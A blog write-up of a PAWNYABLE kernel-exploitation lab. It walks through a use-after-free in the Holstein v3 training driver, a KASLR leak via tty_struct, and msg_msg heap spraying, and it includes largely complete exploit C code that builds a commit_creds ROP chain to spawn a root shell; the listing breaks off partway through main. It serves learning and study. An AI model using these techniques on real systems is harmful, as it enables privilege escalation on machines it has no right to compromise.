    PAWNYABLE ended up being a great way for me to start learning about Linux Kernel exploitation, mainly because I didn’t have to spend any time getting up to speed on a kernel subsystem in order to start wading into the exploitation metagame. For instance, if you are the type of person who learns by doing, and you’re first attempt at learning about this stuff was to write your own exploit for CVE-2022-32250, you would first have to spend a considerable amount of time learning about Netfilter. Instead, PAWNYABLE gives you a straightforward example of a vulnerability in one of a handful of bug-classes, and then gets to work showing you how you could exploit it. I think this strategy is great for beginners like me. It’s worth noting that after having spent some time with PAWNYABLE, I have been able to write some exploits for real world bugs similar to CVE-2022-32250, so my strategy did prove to be fruitful (at least for me).

    I’ve been doing low-level binary stuff (mostly on Linux) for the past 3 years. Initially I was very interested in learning binary exploitation but starting gravitating towards vulnerability discovery and fuzzing. Fuzzing has captivated me since early 2020, and developing my own fuzzing frameworks actually lead to me working as a full time software developer for the last couple of years. So after going pretty deep with fuzzing (objectively not that deep as it relates to the entire fuzzing space, but deep for the uninitiated) , I wanted to circle back and learn at least some aspect of binary exploitation that applied to modern targets.

    The Linux Kernel, as a target, seemed like a happy marriage between multiple things: it’s relatively easy to write exploits for due to a lack of mitigations, exploitable bugs and their resulting exploits have a wide and high impact, and there are active bounty systems/programs for Linux Kernel exploits. As a quick side-note, there have been some tremendous strides made in the world of Linux Kernel fuzzing in the last few years so I knew that specializing in this space would allow me to get up to speed on those approaches/tools.

    So coming into this, I had a pretty good foundation of basic binary exploitation (mostly dated Windows and Linux userland stuff), a few years of C development (to include a few Linux Kernel modules), and some reverse engineering skills.

    What I Did

    To get started, I read through the following PAWNYABLE sections (section names have been Google translated to English):

    • Introduction to kernel exploits
    • kernel debugging with gdb
    • security mechanism (Overview of Exploitation Mitigations)
    • Compile and transfer exploits (working with the kernel image)

    This was great as a starting point because everything is so well organized you don’t have to spend time setting up your environment, its basically just copy pasting a few commands and you’re off and remotely debugging a kernel via GDB (with GEF even).

    Next, I started working on the first challenge which is a stack-based buffer overflow vulnerability in Holstein v1. This is a great starting place because right away you get control of the instruction pointer and from there, you’re learning about things like the way CTF players (and security researchers) often leverage kernel code execution to escalate privileges like prepare_kernel_creds and commit_creds.

    You can write an exploit that bypasses mitigations or not, it’s up to you. I started slowly and wrote an exploit with no mitigations enabled, then slowly turned the mitigations up and changed the exploit as needed.

    After that, I started working on a popular Linux kernel pwn challenge called “kernel-rop” from hxpCTF 2020. I followed along and worked alongside the following blogposts from @_lkmidas:

    This was great because it gave me a chance to reinforce everything I had learned from the PAWNYABLE stack buffer overflow challenge and also I learned a few new things. I also used (https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/) to supplement some of the information.

    As a bonus, I also wrote a version of the exploit that utilized a different technique to elevate privileges: overwriting modprobe_path.

    After all this, I felt like I had a good enough base to get started on the UAF challenge.

    UAF Challenge: Holstein v3

    Some quick vulnerability analysis on the vulnerable driver provided by the author states the problem clearly.

    char *g_buf = NULL;
    
    static int module_open(struct inode *inode, struct file *file)
    {
      printk(KERN_INFO "module_open called\n");
    
      g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);
      if (!g_buf) {
        printk(KERN_INFO "kmalloc failed");
        return -ENOMEM;
      }
    
      return 0;
    }
    

    When we open the kernel driver, char *g_buf gets assigned the result of a call to kzalloc().

    static int module_close(struct inode *inode, struct file *file)
    {
      printk(KERN_INFO "module_close called\n");
      kfree(g_buf);
      return 0;
    }
    

    When we close the kernel driver, g_buf is freed. As the author explains, this is a buggy code pattern since we can open multiple handles to the driver from within our program. Something like this can occur.

    1. We’ve done nothing, g_buf = NULL
    2. We’ve opened the driver, g_buf = 0xffff...a0, and we have fd1 in our program
    3. We’ve opened the driver a second time, g_buf = 0xffff...b0 . The original value of 0xffff...a0 has been overwritten. It can no longer be freed and would cause a memory leak (not super important). We now have fd2 in our program
    4. We close fd1 which calls kfree() on 0xffff...b0 and frees the same pointer we have a reference to with fd2.

    At this point, via our access to fd2, we have a use after free since we can still potentially use a freed reference to g_buf. The module also allows us to use the open file descriptor with read and write methods.

    static ssize_t module_read(struct file *file,
                               char __user *buf, size_t count,
                               loff_t *f_pos)
    {
      printk(KERN_INFO "module_read called\n");
    
      if (count > BUFFER_SIZE) {
        printk(KERN_INFO "invalid buffer size\n");
        return -EINVAL;
      }
    
      if (copy_to_user(buf, g_buf, count)) {
        printk(KERN_INFO "copy_to_user failed\n");
        return -EINVAL;
      }
    
      return count;
    }
    
    static ssize_t module_write(struct file *file,
                                const char __user *buf, size_t count,
                                loff_t *f_pos)
    {
      printk(KERN_INFO "module_write called\n");
    
      if (count > BUFFER_SIZE) {
        printk(KERN_INFO "invalid buffer size\n");
        return -EINVAL;
      }
    
      if (copy_from_user(g_buf, buf, count)) {
        printk(KERN_INFO "copy_from_user failed\n");
        return -EINVAL;
      }
    
      return count;
    }
    

    So with these methods, we are able to read and write to our freed object. This is great for us since we’re free to pretty much do anything we want. We are limited somewhat by the object size which is hardcoded in the code to 0x400.

    At a high-level, UAFs are generally exploited by creating the UAF condition, so we have a reference to a freed object within our control, and then we want to cause the allocation of a different object to fill the space that was previously filled by our freed object.

    So if we allocated a g_buf of size 0x400 and then freed it, we need to place another object in its place. This new object would then be the target of our reads and writes.

    KASLR Bypass

    The first thing we need to do is bypass KASLR by leaking some address that is a known static offset from the kernel image base. I started searching for objects that have leakable members and again, @ptrYudai came to the rescue with a catalog on useful Linux Kernel data structures for exploitation. This lead me to the tty_struct which is allocated on the same slab cache as our 0x400 buffer, the kmalloc-1024. The tty_struct has a field called tty_operations which is a pointer to a function table that is a static offset from the kernel base. So if we can leak the address of tty_operations we will have bypassed KASLR. This struct was used by NCCGROUP for the same purpose in their exploit of CVE-2022-32250.

    It’s important to note that slab cache that we’re targeting is per-CPU. Luckily, the VM we’re given for the challenge only has one logical core so we don’t have to worry about CPU affinity for this exercise. On most systems with more than one core, we would have to worry about influencing one specific CPU’s cache.

    So with our module_read ability, we will simply:

    1. Free g_buf
    2. Create dev_tty structs until one hopefully fills the freed space where g_buf used to live
    3. Call module_read to get a copy of the g_buf which is now actually our dev_tty and then inspect the value of tty_struct->tty_operations.

    Here are some snippets of code related to that from the exploit:

    // Leak a tty_struct->ops field which is constant offset from kernel base
    uint64_t leak_ops(int fd) {
        if (fd < 0) {
            err("Bad fd given to `leak_ops()`");
        }
    
        /* tty_struct {
            int magic;      // 4 bytes
            struct kref;    // 4 bytes (single member is an int refcount_t)
            struct device *dev; // 8 bytes
            struct tty_driver *driver; // 8 bytes
            const struct tty_operations *ops; (offset 24 (or 0x18))
            ...
        } */
    
        // Read first 32 bytes of the structure
        unsigned char *ops_buf = calloc(1, 32);
        if (!ops_buf) {
            err("Failed to allocate ops_buf");
        }
    
        ssize_t bytes_read = read(fd, ops_buf, 32);
        if (bytes_read != (ssize_t)32) {
            err("Failed to read enough bytes from fd: %d", fd);
        }
    
        uint64_t ops = *(uint64_t *)&ops_buf[24];
        info("tty_struct->ops: 0x%lx", ops);
    
        // Solve for kernel base, keep the last 12 bits
        uint64_t test = ops & 0b111111111111;
    
        // These magic compares are for static offsets on this kernel
        if (test == 0xb40ULL) {
            return ops - 0xc39b40ULL;
        }
    
        else if (test == 0xc60ULL) {
            return ops - 0xc39c60ULL;
        }
    
        else {
            err("Got an unexpected tty_struct->ops ptr");
        }
    }
    

    There’s a confusing part about ANDing off the lower 12 bits of the leaked value and that’s because I kept getting one of two values during multiple runs of the exploit within the same boot. This is probably because there’s two kinds of tty_structs that can be allocated and they are allocated in pairs. This if else if block just handles both cases and solves the kernel base for us. So at this point we have bypassed KASLR because we know the base address the kernel is loaded at.

    RIP Control

    Next, we need someway to high-jack execution. Luckily, we can use the same data structure, tty_struct as we can write to the object using module_write and we can overwrite the pointer value for tty_struct->ops.

    struct tty_operations is a table of function pointers, and looks like this:

    struct tty_struct * (*lookup)(struct tty_driver *driver,
    			struct file *filp, int idx);
    	int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
    	void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
    	int  (*open)(struct tty_struct * tty, struct file * filp);
    	void (*close)(struct tty_struct * tty, struct file * filp);
    	void (*shutdown)(struct tty_struct *tty);
    	void (*cleanup)(struct tty_struct *tty);
    	int  (*write)(struct tty_struct * tty,
    		      const unsigned char *buf, int count);
    	int  (*put_char)(struct tty_struct *tty, unsigned char ch);
    	void (*flush_chars)(struct tty_struct *tty);
    	unsigned int (*write_room)(struct tty_struct *tty);
    	unsigned int (*chars_in_buffer)(struct tty_struct *tty);
    	int  (*ioctl)(struct tty_struct *tty,
    		    unsigned int cmd, unsigned long arg);
    ...SNIP...
    

    These functions are invoked on the tty_struct when certain actions are performed on an instance of a tty_struct. For example, when the tty_struct’s controlling process exits, several of these functions are called in a row: close(), shutdown(), and cleanup().

    So our plan, will be to:

    1. Create UAF condition
    2. Occupy free’d memory with tty_struct
    3. Read a copy of the tty_struct back to us in userland
    4. Alter the tty->ops value to point to a faked function table that we control
    5. Write the new data back to the tty_struct which is now corrupted
    6. Do something to the tty_struct that causes a function we control to be invoked

    PAWNYABLE tells us that a popular target is invoking ioctl() as the function takes several arguments which are user-controlled.

    int  (*ioctl)(struct tty_struct *tty,
    		    unsigned int cmd, unsigned long arg);
    

    From userland, we can supply the values for cmd and arg. This gives us some flexibility. The value we can provide for cmd is somewhat limited as an unsigned int is only 4 bytes. arg gives us a full 8 bytes of control over RDX. Since we can control the contents of RDX whenever we invoke ioctl(), we need to find a gadget to pivot the stack to some code in the kernel heap that we can control. I found such a gadget here:

    0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;
    

    We will push a value from RDX onto the stack, and then later pop that value into RSP. When ioctl() returns, we will return to whatever value we called ioctl() with in arg. So the control flow will go something like:

    1. Invoke ioctl() on our corrupted tty_struct
    2. ioctl() has been overwritten by a stack-pivot gadget that places the location of our ROP chain into RSP
    3. ioctl() returns execution to our ROP chain

    So now we have a new problem, how do we create a fake function table and ROP chain in the kernel heap AND figure out where we stored them?

    Creating/Locating a ROP Chain and Fake Function Table

    This is where I started to diverge from the author’s exploitation strategy. I couldn’t quite follow along with the intended solution for this problem, so I began searching for other ways. With our extremely powerful read capability in mind, I remembered the msg_msg struct from @ptrYudai’s aforementioned structure catalog, and realized that the structure was perfect for our purposes as it:

    • Stores arbitrary data inline in the structure body (not via a pointer to the heap)
    • Contains a linked-list member that contains the addresses to prev and next messages within the same kernel message queue

    So quickly, a strategy began to form. We could:

    1. Create our ROP chain and Fake Function table in a buffe
    2. Send the buffer as the body of a msg_msg struct
    3. Use our module_read capability to read the msg_msg->list.next and msg_msg->list.prev values to know where in the heap at least two of our messages were stored

    With this ability, we would know exactly what address to supply as an argument to ioctl() when we invoke it in order to pivot the stack into our ROP chain. Here is some code related to that from the exploit:

    // Allocate one msg_msg on the heap
    size_t send_message() {
        // Calcuate current queue
        if (num_queue < 1) {
            err("`send_message()` called with no message queues");
        }
        int curr_q = msg_queue[num_queue - 1];
    
        // Send message
        size_t fails = 0;
        struct msgbuf {
            long mtype;
            char mtext[MSG_SZ];
        } msg;
    
        // Unique identifier we can use
        msg.mtype = 0x1337;
    
        // Construct the ROP chain
        memset(msg.mtext, 0, MSG_SZ);
    
        // Pattern for offsets (debugging)
        uint64_t base = 0x41;
        uint64_t *curr = (uint64_t *)&msg.mtext[0];
        for (size_t i = 0; i < 25; i++) {
            uint64_t fill = base << 56;
            fill |= base << 48;
            fill |= base << 40;
            fill |= base << 32;
            fill |= base << 24;
            fill |= base << 16;
            fill |= base << 8;
            fill |= base;
            
            *curr++ = fill;
            base++; 
        }
    
        // ROP chain
        uint64_t *rop = (uint64_t *)&msg.mtext[0];
        *rop++ = pop_rdi; 
        *rop++ = 0x0;
        *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
        *rop++ = xchg_rdi_rax; // Place creds into RDI 
        *rop++ = commit_creds; // Now we have super powers
        *rop++ = kpti_tramp;
        *rop++ = 0x0; // pop rax inside kpti_tramp
        *rop++ = 0x0; // pop rdi inside kpti_tramp
        *rop++ = (uint64_t)pop_shell; // Return here
        *rop++ = user_cs;
        *rop++ = user_rflags;
        *rop++ = user_sp;
        *rop   = user_ss;
    
        /* struct tty_operations {
            struct tty_struct * (*lookup)(struct tty_driver *driver,
                    struct file *filp, int idx);
            int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
            void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
            int  (*open)(struct tty_struct * tty, struct file * filp);
            void (*close)(struct tty_struct * tty, struct file * filp);
            void (*shutdown)(struct tty_struct *tty);
            void (*cleanup)(struct tty_struct *tty);
            int  (*write)(struct tty_struct * tty,
                    const unsigned char *buf, int count);
            int  (*put_char)(struct tty_struct *tty, unsigned char ch);
            void (*flush_chars)(struct tty_struct *tty);
            unsigned int (*write_room)(struct tty_struct *tty);
            unsigned int (*chars_in_buffer)(struct tty_struct *tty);
            int  (*ioctl)(struct tty_struct *tty,
                    unsigned int cmd, unsigned long arg);
            ...
        } */
    
        // Populate the 12 function pointers in the table that we have created.
        // There are 3 handlers that are invoked for allocated tty_structs when 
        // their controlling process exits, they are close(), shutdown(),
        // and cleanup(). We have to overwrite these pointers for when we exit our
        // exploit process or else the kernel will panic with a RIP of 
        // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
        uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
        for (size_t i = 0; i < 12; i++) {
            // If i == 4, we're on the close() handler, set to ret gadget
            if (i == 4) { *func_table++ = ret; continue; }
    
            // If i == 5, we're on the shutdown() handler, set to ret gadget
            if (i == 5) { *func_table++ = ret; continue; }
    
            // If i == 6, we're on the cleanup() handler, set to ret gadget
            if (i == 6) { *func_table++ = ret; continue; }
    
            // Magic value for debugging
            *func_table++ = 0xdeadbeefdeadbe00 + i;
        }
    
        // Put our gadget address as the ioctl() handler to pivot stack
        *func_table = push_rdx;
    
        // Spray msg_msg's on the heap
        if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
            fails++;
        }
    
        return fails;
    }
    

    I got a bit wordy with the comments in this block, but it’s for good reason. I didn’t want the exploit to ruin the kernel state, I wanted to exit cleanly. This presented a problem as we are completely hi-jacking the ops function table which the kernel will use to cleanup our tty_struct. So I found a gadget that simply performs a ret operation, and overwrote the function pointers for close(), shutdown(), and cleanup() so that when they are invoked, they simply return and the kernel is apparently fine with this and doesn’t panic.

    So our message body looks something like: <—-ROP—-Faked Function Table—->

    Here is the code I used to overwrite the tty_struct->ops pointer:

    void overwrite_ops(int fd) {
        unsigned char g_buf[GBUF_SZ] = { 0 };
        ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
        if (bytes_read != (ssize_t)GBUF_SZ) {
            err("Failed to read enough bytes from fd: %d", fd);
        }
    
        // Overwrite the tty_struct->ops pointer with ROP address
        *(uint64_t *)&g_buf[24] = fake_table;
        ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
        if (bytes_written != (ssize_t)GBUF_SZ) {
            err("Failed to write enough bytes to fd: %d", fd);
        }
    }
    

    So now that we know where our ROP chain is, and where our faked function table is, and we have the perfect stack pivot gadget, the rest of this process is simply building a real ROP chain which I will leave out of this post.

    As a first timer, this tiny bit of creativity to leverage the read ability to leak the addresses of msg_msg structs was enough to get me hooked. Here is a picture of the exploit in action:

    Miscellaneous

    There were some things I tried to do to increase the exploit’s reliability.

    One was to check the magic value in the leaked tty_structs to make sure a tty_struct had actually filled our freed memory and not another object. This is extremely convenient! All tty_structs have 0x5401 at tty->magic.

    Another thing I did was spray msg_msg structs with an easily recognizable message type of 0x1337. This way when leaked, I could easily verify I was in fact leaking msg_msg contents and not some other arbitrary data structure. Another thing you could do would be to make sure supposed kernel addresses start with 0xffff.

    Finally, there was the patching of the clean-up-related function pointers in tty->ops.

    Further Reading

    There are lots of challenges besides the UAF one on PAWNYABLE, please go check them out. One of the primary reasons I wrote this was to get the author’s project more visitors and beneficiaries. It has made a big difference for me and in the almost month since I finished this challenge, I have learned a ton. Special thanks to @chompie1337 for letting me complain and giving me helpful advice/resources.

    Some awesome blogposts I read throughout the learning process up to this point include:

    • https://www.graplsecurity.com/post/iou-ring-exploiting-the-linux-kernel
    • https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
    • https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/
    • https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html

    Exploit Code

    // One liner to add exploit to filesystem
    // gcc exploit.c -o exploit -static && cp exploit rootfs && cd rootfs && find . -print0 | cpio -o --format=newc --null --owner=root > ../rootfs.cpio && cd ../
    
    #include <stdio.h> /* printf */
    #include <sys/types.h> /* open */
    #include <sys/stat.h> /* open */
    #include <fcntl.h> /* open */
    #include <stdlib.h> /* exit */
    #include <stdint.h> /* int_t's */
    #include <unistd.h> /* getuid */
    #include <string.h> /* memset */
    #include <sys/ipc.h> /* msg_msg */ 
    #include <sys/msg.h> /* msg_msg */
    #include <sys/ioctl.h> /* ioctl */
    #include <stdarg.h> /* va_args */
    #include <stdbool.h> /* true, false */ 
    
    #define DEV "/dev/holstein"
    #define PTMX "/dev/ptmx"
    
    #define PTMX_SPRAY (size_t)50       // Number of terminals to allocate
    #define MSG_SPRAY (size_t)32        // Number of msg_msg's per queue
    #define NUM_QUEUE (size_t)4         // Number of msg queues
    #define MSG_SZ (size_t)512          // Size of each msg_msg, modulo 8 == 0
    #define GBUF_SZ (size_t)0x400       // Size of g_buf in driver
    
    // User state globals
    uint64_t user_cs;
    uint64_t user_ss;
    uint64_t user_rflags;
    uint64_t user_sp;
    
    // Mutable globals, when in Rome
    uint64_t base;
    uint64_t rop_addr;
    uint64_t fake_table;
    uint64_t ioctl_ptr;
    int open_ptmx[PTMX_SPRAY] = { 0 };          // Store fds for clean up/ioctl()
    int num_ptmx = 0;                           // Number of open fds
    int msg_queue[NUM_QUEUE] = { 0 };           // Initialized message queues
    int num_queue = 0;
    
    // Misc constants. 
    const uint64_t rop_len = 200;
    const uint64_t ioctl_off = 12 * sizeof(uint64_t);
    
    // Gadgets
    // 0x723c0: commit_creds
    uint64_t commit_creds;
    // 0x72560: prepare_kernel_cred
    uint64_t prepare_kernel_cred;
    // 0x800e10: swapgs_restore_regs_and_return_to_usermode
    uint64_t kpti_tramp;
    // 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret; (stack pivot)
    uint64_t push_rdx;
    // 0x35738d: pop rdi; ret;
    uint64_t pop_rdi;
    // 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
    uint64_t xchg_rdi_rax;
    // 0x32afea: ret;
    uint64_t ret;
    
    void err(const char* format, ...) {
        if (!format) {
            exit(-1);
        }
    
        fprintf(stderr, "%s", "[!] ");
        va_list args;
        va_start(args, format);
        vfprintf(stderr, format, args);
        va_end(args);
        fprintf(stderr, "%s", "\n");
        exit(-1);
    }
    
    void info(const char* format, ...) {
        if (!format) {
            return;
        }
        
        fprintf(stderr, "%s", "[*] ");
        va_list args;
        va_start(args, format);
        vfprintf(stderr, format, args);
        va_end(args);
        fprintf(stderr, "%s", "\n");
    }
    
    void save_state(void) {
        __asm__(
            ".intel_syntax noprefix;"   
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            // Push CPU flags onto stack
            "pushf;"
            // Pop CPU flags into var
            "pop user_rflags;"
            ".att_syntax;"
        );
    }
    
    // Should spawn a root shell
    void pop_shell(void) {
        uid_t uid = getuid();
        if (uid != 0) {
            err("We are not root, wtf?");
        }
    
        info("We got root, spawning shell!");
        system("/bin/sh");
        exit(0);
    }
    
    // Open a char device, just exit on error, this is exploit code
    int open_device(char *dev, int flags) {
        int fd = -1;
        if (!dev) {
            err("NULL ptr given to `open_device()`");
        }
    
        fd = open(dev, flags);
        if (fd < 0) {
            err("Failed to open '%s'", dev);
        }
    
        return fd;
    }
    
    // Spray kmalloc-1024 sized '/dev/ptmx' structures on the kernel heap
    void alloc_ptmx() {
        int fd = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
        if (fd < 0) {
            err("Failed to open /dev/ptmx");
        }
    
        open_ptmx[num_ptmx] = fd;
        num_ptmx++;
    }
    
    // Check to see if we have a reference to a tty_struct by reading in the magic
    // number for the current allocation in our slab
    bool found_ptmx(int fd) {
        unsigned char magic_buf[4];
        if (fd < 0) {
            err("Bad fd given to `found_ptmx()`\n");
        }
    
        ssize_t bytes_read = read(fd, magic_buf, 4);
        if (bytes_read != (ssize_t)bytes_read) {
            err("Failed to read enough bytes from fd: %d", fd);
        }
    
        if (*(int32_t *)magic_buf != 0x5401) {
            return false;
        }
    
        return true;
    }
    
    // Leak a tty_struct->ops field which is constant offset from kernel base
    uint64_t leak_ops(int fd) {
        if (fd < 0) {
            err("Bad fd given to `leak_ops()`");
        }
    
        /* tty_struct {
            int magic;      // 4 bytes
            struct kref;    // 4 bytes (single member is an int refcount_t)
            struct device *dev; // 8 bytes
            struct tty_driver *driver; // 8 bytes
            const struct tty_operations *ops; (offset 24 (or 0x18))
            ...
        } */
    
        // Read first 32 bytes of the structure
        unsigned char *ops_buf = calloc(1, 32);
        if (!ops_buf) {
            err("Failed to allocate ops_buf");
        }
    
        ssize_t bytes_read = read(fd, ops_buf, 32);
        if (bytes_read != (ssize_t)32) {
            err("Failed to read enough bytes from fd: %d", fd);
        }
    
        uint64_t ops = *(uint64_t *)&ops_buf[24];
        info("tty_struct->ops: 0x%lx", ops);
    
        // Solve for kernel base, keep the last 12 bits
        uint64_t test = ops & 0b111111111111;
    
        // These magic compares are for static offsets on this kernel
        if (test == 0xb40ULL) {
            return ops - 0xc39b40ULL;
        }
    
        else if (test == 0xc60ULL) {
            return ops - 0xc39c60ULL;
        }
    
        else {
            err("Got an unexpected tty_struct->ops ptr");
        }
    }
    
    void solve_gadgets(void) {
        // 0x723c0: commit_creds
        commit_creds = base + 0x723c0ULL;
        printf("    >> commit_creds located @ 0x%lx\n", commit_creds);
    
        // 0x72560: prepare_kernel_cred
        prepare_kernel_cred = base + 0x72560ULL;
        printf("    >> prepare_kernel_cred located @ 0x%lx\n", prepare_kernel_cred);
    
        // 0x800e10: swapgs_restore_regs_and_return_to_usermode
        kpti_tramp = base + 0x800e10ULL + 22; // 22 offset, avoid pops
        printf("    >> kpti_tramp located @ 0x%lx\n", kpti_tramp);
    
        // 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;
        push_rdx = base + 0x14fbeaULL;
        printf("    >> push_rdx located @ 0x%lx\n", push_rdx);
    
        // 0x35738d: pop rdi; ret;
        pop_rdi = base + 0x35738dULL;
        printf("    >> pop_rdi located @ 0x%lx\n", pop_rdi);
    
        // 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
        xchg_rdi_rax = base + 0x487980ULL;
        printf("    >> xchg_rdi_rax located @ 0x%lx\n", xchg_rdi_rax);
    
        // 0x32afea: ret;
        ret = base + 0x32afeaULL;
        printf("    >> ret located @ 0x%lx\n", ret);
    }
    
    // Initialize a kernel message queue
    int init_msg_q(void) {
        int msg_qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
        if (msg_qid == -1) {
            err("`msgget()` failed to initialize queue");
        }
    
        msg_queue[num_queue] = msg_qid;
        num_queue++;
    }
    
    // Allocate one msg_msg on the heap
    size_t send_message() {
        // Calcuate current queue
        if (num_queue < 1) {
            err("`send_message()` called with no message queues");
        }
        int curr_q = msg_queue[num_queue - 1];
    
        // Send message
        size_t fails = 0;
        struct msgbuf {
            long mtype;
            char mtext[MSG_SZ];
        } msg;
    
        // Unique identifier we can use
        msg.mtype = 0x1337;
    
        // Construct the ROP chain
        memset(msg.mtext, 0, MSG_SZ);
    
        // Pattern for offsets (debugging)
        uint64_t base = 0x41;
        uint64_t *curr = (uint64_t *)&msg.mtext[0];
        for (size_t i = 0; i < 25; i++) {
            uint64_t fill = base << 56;
            fill |= base << 48;
            fill |= base << 40;
            fill |= base << 32;
            fill |= base << 24;
            fill |= base << 16;
            fill |= base << 8;
            fill |= base;
            
            *curr++ = fill;
            base++; 
        }
    
        // ROP chain
        uint64_t *rop = (uint64_t *)&msg.mtext[0];
        *rop++ = pop_rdi; 
        *rop++ = 0x0;
        *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
        *rop++ = xchg_rdi_rax; // Place creds into RDI 
        *rop++ = commit_creds; // Now we have super powers
        *rop++ = kpti_tramp;
        *rop++ = 0x0; // pop rax inside kpti_tramp
        *rop++ = 0x0; // pop rdi inside kpti_tramp
        *rop++ = (uint64_t)pop_shell; // Return here
        *rop++ = user_cs;
        *rop++ = user_rflags;
        *rop++ = user_sp;
        *rop   = user_ss;
    
        /* struct tty_operations {
            struct tty_struct * (*lookup)(struct tty_driver *driver,
                    struct file *filp, int idx);
            int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
            void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
            int  (*open)(struct tty_struct * tty, struct file * filp);
            void (*close)(struct tty_struct * tty, struct file * filp);
            void (*shutdown)(struct tty_struct *tty);
            void (*cleanup)(struct tty_struct *tty);
            int  (*write)(struct tty_struct * tty,
                    const unsigned char *buf, int count);
            int  (*put_char)(struct tty_struct *tty, unsigned char ch);
            void (*flush_chars)(struct tty_struct *tty);
            unsigned int (*write_room)(struct tty_struct *tty);
            unsigned int (*chars_in_buffer)(struct tty_struct *tty);
            int  (*ioctl)(struct tty_struct *tty,
                    unsigned int cmd, unsigned long arg);
            ...
        } */
    
        // Populate the 12 function pointers in the table that we have created.
        // There are 3 handlers that are invoked for allocated tty_structs when 
        // their controlling process exits, they are close(), shutdown(),
        // and cleanup(). We have to overwrite these pointers for when we exit our
        // exploit process or else the kernel will panic with a RIP of 
        // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
        uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
        for (size_t i = 0; i < 12; i++) {
            // If i == 4, we're on the close() handler, set to ret gadget
            if (i == 4) { *func_table++ = ret; continue; }
    
            // If i == 5, we're on the shutdown() handler, set to ret gadget
            if (i == 5) { *func_table++ = ret; continue; }
    
            // If i == 6, we're on the cleanup() handler, set to ret gadget
            if (i == 6) { *func_table++ = ret; continue; }
    
            // Magic value for debugging
            *func_table++ = 0xdeadbeefdeadbe00 + i;
        }
    
        // Put our gadget address as the ioctl() handler to pivot stack
        *func_table = push_rdx;
    
        // Spray msg_msg's on the heap
        if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
            fails++;
        }
    
        return fails;
    }
    
    // Check to see if we have a reference to one of our msg_msg structs
    bool found_msg(int fd) {
        // Read out the msg_msg
        unsigned char msg_buf[GBUF_SZ] = { 0 };
        ssize_t bytes_read = read(fd, msg_buf, GBUF_SZ);
        if (bytes_read != (ssize_t)GBUF_SZ) {
            err("Failed to read from holstein");
        }
    
        /* msg_msg {
            struct list_head m_list {
                struct list_head *next, *prev;
            } // 16 bytes
            long m_type; // 8 bytes
            int m_ts; // 4 bytes
            struct msg_msgseg* next; // 8 bytes
            void *security; // 8 bytes
    
            ===== Body Starts Here (offset 48) =====
        }*/ 
    
        // Some heuristics to see if we indeed have a good msg_msg
        uint64_t next = *(uint64_t *)&msg_buf[0];
        uint64_t prev = *(uint64_t *)&msg_buf[sizeof(uint64_t)];
        int64_t m_type = *(uint64_t *)&msg_buf[sizeof(uint64_t) * 2];
    
        // Not one of our msg_msg structs
        if (m_type != 0x1337L) {
            return false;
        }
    
        // We have to have valid pointers
        if (next == 0 || prev == 0) {
            return false;
        }
    
        // I think the pointers should be different as well
        if (next == prev) {
            return false;
        }
    
        info("Found msg_msg struct:");
        printf("    >> msg_msg.m_list.next: 0x%lx\n", next);
        printf("    >> msg_msg.m_list.prev: 0x%lx\n", prev);
        printf("    >> msg_msg.m_type: 0x%lx\n", m_type);
    
        // Update rop address
        rop_addr = 48 + next;
        
        return true;
    }
    
    void overwrite_ops(int fd) {
        unsigned char g_buf[GBUF_SZ] = { 0 };
        ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
        if (bytes_read != (ssize_t)GBUF_SZ) {
            err("Failed to read enough bytes from fd: %d", fd);
        }
    
        // Overwrite the tty_struct->ops pointer with ROP address
        *(uint64_t *)&g_buf[24] = fake_table;
        ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
        if (bytes_written != (ssize_t)GBUF_SZ) {
            err("Failed to write enough bytes to fd: %d", fd);
        }
    }
    
    int main(int argc, char *argv[]) {
        int fd1;
        int fd2;
        int fd3;
        int fd4;
        int fd5;
        int fd6;
    
        info("Saving user space state...");
        save_state();
    
        info("Freeing fd1...");
        fd1 = open_device(DEV, O_RDWR);
        fd2 = open(DEV, O_RDWR);
        close(fd1);
    
        // Allocate '/dev/ptmx' structs until we allocate one in our free'd slab
        info("Spraying tty_structs...");
        size_t p_remain = PTMX_SPRAY;
        while (p_remain--) {
            alloc_ptmx();
            printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);
    
            // Check to see if we found one of our tty_structs
            if (found_ptmx(fd2)) {
                break;
            }
    
            if (p_remain == 0) { err("Failed to find tty_struct"); }
        }
    
        info("Leaking tty_struct->ops...");
        base = leak_ops(fd2);
        info("Kernel base: 0x%lx", base);
    
        // Clean up open fds
        info("Cleaning up our tty_structs...");
        for (size_t i = 0; i < num_ptmx; i++) {
            close(open_ptmx[i]);
            open_ptmx[i] = 0;
        }
        num_ptmx = 0;
    
        // Solve the gadget addresses now that we have base
        info("Solving gadget addresses");
        solve_gadgets();
    
        // Create a hole for a msg_msg
        info("Freeing fd3...");
        fd3 = open_device(DEV, O_RDWR);
        fd4 = open_device(DEV, O_RDWR);
        close(fd3);
    
